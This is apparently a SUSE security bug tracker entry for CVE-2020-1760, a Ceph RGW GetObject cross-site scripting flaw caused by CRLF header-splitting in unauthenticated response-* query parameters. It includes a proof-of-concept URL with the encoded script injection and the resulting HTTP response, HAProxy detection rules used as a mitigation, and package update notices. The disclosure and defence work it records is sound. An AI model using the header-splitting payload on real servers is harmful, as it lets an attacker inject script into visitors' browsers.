Bug 1166484 (CVE-2020-1760)

Summary: VUL-0: CVE-2020-1760: ceph: RGW GetObject has a XSS via header-splitting
Product: [Novell Products] SUSE Security Incidents Reporter: Wolfgang Frisch <wolfgang.frisch>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: cathy.hu, ceph-bugs, holgi, lmb, ncutler, rfrohl, tserong
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/254710/
Whiteboard: CVSSv3.1:SUSE:CVE-2020-1760:6.1:(AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Wolfgang Frisch 2020-03-12 11:09:12 UTC 
We received the following bug report via security@ceph.io.
-------------------------------------------------------------------------

RGW GetObject has a XSS via header-splitting, present all the way up to
master.

Introduced 2012/10/08 commit f4a0b2d9260a4523745875e3977a8a1ef9dc5e2e

The response-* query parameters have two security issues that need fixing.
1. Do not require authentication
2. Do not validate input queryparms for embedded CRLF

Conditions:
- Knowing the path to a publicly readable object on any RGW cluster
- The object must be at least large enough to cover the attack body

By combining the issues, there it's possible to run an XSS on any object!

The GetObject specifications
https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetObject.html
*Overriding Response Header Values*
>> You must sign the request, either using an Authorization header or a
>> presigned URL, when using these parameters. They cannot be used with an
>> unsigned (anonymous) request.

PoC URL:
https://sfo2.digitaloceanspaces.com/storage-security-cdn/foobar?response-content-type=testing%0D%0AContent-Type:+text/html%0D%0A%0D%0A%3Ch1%3EInjected+body%3C/h1%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cstyle%3E

The "response-content-type" gets the URL-encoded XSS injection:
===
testing
Content-Type: text/html

<h1>Injected body</h1><script>alert(1);</script><style>
===

Example full output including HTTP headers, on production Luminous system:
===
HTTP/1.1 200 OK
Content-Length: 10893
Accept-Ranges: bytes
Last-Modified: Tue, 10 Mar 2020 20:42:01 GMT
ETag: "157d667eaff2015078ee153eca7d04fb"
x-amz-meta-s3cmd-attrs: atime:1583872822/ctime:1583872916/gid:10000/gname:robbat2/md5:157d667eaff2015078ee153eca7d04fb/mode:33188/mtime:1583872916/uid:10000/uname:robbat2
x-amz-request-id: tx000000000000010ae6360-005e692ad4-44315b-sfo2a
Content-Type: testing
Content-Type: text/html
Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method

<h1>Injected body</h1><script>alert(1);</script><style>
Date: Wed, 11 Mar 2020 18:15:48 GMT

foobar 1
foobar 2
foobar 3
foobar 4
foobar 5
...
===

The Strict-Transport-Security & Vary headers are injected by the reverse-proxy.

Please ensure the security issue is credited appropriately:
- Initial report to DigitalOcean by William Bowling twitter handle @wcbowling
- Further evaluation and extension to Robin H. Johnson @robbat2, rjohnson@digitalocean.com
Comment 1 Robert Frohl 2020-03-27 08:24:23 UTC 
Here's what I can share of the HAProxy mitigation:
===
acl req_s3_GetObject REDACTED ## redacted uses internal Lua to detect GetObject
acl has_accesskey REDACTED ## redacted uses internal Lua to detect & validate signature

# detection 1, QPs present
acl req_s3_GetObject_urlp_response url_param(response-cache-control) -m found
acl req_s3_GetObject_urlp_response url_param(response-expires) -m found
acl req_s3_GetObject_urlp_response url_param(response-content-disposition) -m found
acl req_s3_GetObject_urlp_response url_param(response-content-encoding) -m found
acl req_s3_GetObject_urlp_response url_param(response-content-language) -m found
acl req_s3_GetObject_urlp_response url_param(response-content-type) -m found

# detection 2, QPs containing unprintable ascii incl CRLR
acl req_s3_GetObject_urlp_response_crlf url_param(response-cache-control) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
acl req_s3_GetObject_urlp_response_crlf url_param(response-expires) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
acl req_s3_GetObject_urlp_response_crlf url_param(response-content-disposition) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
acl req_s3_GetObject_urlp_response_crlf url_param(response-content-encoding) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
acl req_s3_GetObject_urlp_response_crlf url_param(response-content-language) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f
acl req_s3_GetObject_urlp_response_crlf url_param(response-content-type) -m sub -i %00 %01 %02 %03 %04 %05 %06 %07 %08 %09 %0a %0b %0c %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b %1c %1d %1e %1f

# block for detection 1
http-request use-service lua.REDACTED if req_s3_GetObject req_s3_GetObject_urlp_response !has_accesskey

# block for detection 2
http-request use-service lua.REDACTED if req_s3_GetObject req_s3_GetObject_urlp_response_crlf
===
Comment 7 Swamp Workflow Management 2020-04-06 22:16:35 UTC 
SUSE-SU-2020:0930-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1166403,1166484
CVE References: CVE-2020-1759,CVE-2020-1760
Sources used:
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15-SP1 (src):    ceph-14.2.5.389+gb0f23ac248-3.35.2, ceph-test-14.2.5.389+gb0f23ac248-3.35.2
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    ceph-14.2.5.389+gb0f23ac248-3.35.2
SUSE Enterprise Storage 6 (src):    ceph-14.2.5.389+gb0f23ac248-3.35.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Swamp Workflow Management 2020-04-08 19:19:32 UTC 
SUSE-SU-2020:0962-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1166484
CVE References: CVE-2020-1760
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    ceph-12.2.12+git.1585658687.363df3a813-2.42.4
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    ceph-12.2.12+git.1585658687.363df3a813-2.42.4
SUSE Linux Enterprise Server 12-SP5 (src):    ceph-12.2.12+git.1585658687.363df3a813-2.42.4
SUSE Linux Enterprise Server 12-SP4 (src):    ceph-12.2.12+git.1585658687.363df3a813-2.42.4
SUSE Enterprise Storage 5 (src):    ceph-12.2.12+git.1585658687.363df3a813-2.42.4

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 9 Swamp Workflow Management 2020-04-10 13:13:39 UTC 
openSUSE-SU-2020:0494-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1166403,1166484
CVE References: CVE-2020-1759,CVE-2020-1760
Sources used:
openSUSE Leap 15.1 (src):    ceph-14.2.5.389+gb0f23ac248-lp151.2.13.1, ceph-test-14.2.5.389+gb0f23ac248-lp151.2.13.1
Comment 16 Hu 2022-08-16 08:28:12 UTC 
Thanks a lot for clarifying. Closing.